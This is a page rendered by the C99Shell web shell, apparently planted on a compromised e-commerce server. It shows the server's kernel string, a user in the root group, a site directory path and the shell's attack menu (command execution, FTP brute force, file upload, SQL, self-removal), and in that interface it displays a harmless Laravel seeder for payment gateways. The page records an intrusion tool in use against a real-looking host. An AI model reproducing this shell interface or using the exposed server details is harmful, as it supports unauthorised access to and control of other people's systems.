!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/Gateway/Database/Seeders/   drwxr-xr-x
Free 26.02 GB of 117.98 GB (22.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GatewaysTableSeeder.php (2.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Modules\Gateway\Database\Seeders;

use 
Illuminate\Database\Seeder;

class 
GatewaysTableSeeder extends Seeder
{

    
/**
     * Auto generated seed file
     *
     * @return void
     */
    
public function run()
    {


        
\DB::table('gateways')->delete();

        
\DB::table('gateways')->insert(array(

            
=>
            array(
                
'id' => 8,
                
'alias' => 'cashondelivery',
                
'name' => 'CashOnDelivery',
                
'sandbox' => 1,
                
'data' => '{"status":"1","instruction":"Kindly verify your order, and make cash payment in full (as mentioned on order invoice or shipping label) when the delivery agent arrives at your doorstep with your order."}',
                
'instruction' => 'Kindly verify your order, and make cash payment in full (as mentioned on order invoice or shipping label) when the delivery agent arrives at your doorstep with your order.',
                
'image' => 'thumbnail.png',
                
'status' => 1,
            ),
            
=>
            array(
                
'id' => 9,
                
'alias' => 'directbanktransfer',
                
'name' => 'DirectBankTransfer',
                
'sandbox' => 1,
                
'data' => '{"status":"1","instruction":"Make your payment directly into our bank account. Please use your Order ID as the payment reference. Your order will not be shipped until the funds have cleared in our account."}',
                
'instruction' => 'Make your payment directly into our bank account. Please use your Order ID as the payment reference. Your order will not be shipped until the funds have cleared in our account.',
                
'image' => 'thumbnail.png',
                
'status' => 1,
            ),
            
=>
            array(
                
'id' => 10,
                
'alias' => 'checkpayments',
                
'name' => 'CheckPayments',
                
'sandbox' => 1,
                
'data' => '{"status":"1","instruction":"Please send a check to Store Name, Store Street, Store Town, Store State / County, Store Postcode."}',
                
'instruction' => 'Please send a check to Store Name, Store Street, Store Town, Store State / County, Store Postcode.',
                
'image' => 'thumbnail.png',
                
'status' => 1,
            ),
        ));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--